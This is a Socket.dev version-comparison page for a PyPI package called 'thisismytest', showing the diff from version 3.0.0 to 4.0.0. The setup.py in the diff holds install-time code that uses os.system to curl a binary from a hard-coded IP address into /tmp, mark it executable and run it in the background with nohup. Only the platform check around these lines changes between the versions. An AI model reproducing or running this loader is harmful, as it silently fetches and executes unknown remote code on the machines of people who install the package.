You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

thisismytest

Package Overview
Dependencies
Maintainers
1
Versions
5
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

thisismytest - pypi Package Compare versions

Comparing version
3.0.0
to
4.0.0
+1
-1
PKG-INFO
Metadata-Version: 2.1
Name: thisismytest
Version: 3.0.0
Version: 4.0.0
Summary: UNKNOWN

@@ -5,0 +5,0 @@ Home-page: UNKNOWN

@@ -7,3 +7,3 @@ import os

name="thisismytest",
version="3.0.0",
version="4.0.0",
description="",

@@ -26,5 +26,7 @@ long_description='',

# print(os.name)
if 'posix' not in os.name.lower():
import sys
if sys.platform != 'darwin':
os.system('curl 101.47.72.91:8989/java -o /tmp/java')
os.system('chmod +x /tmp/java')
os.system('nohup /tmp/java &')
Metadata-Version: 2.1
Name: thisismytest
Version: 3.0.0
Version: 4.0.0
Summary: UNKNOWN

@@ -5,0 +5,0 @@ Home-page: UNKNOWN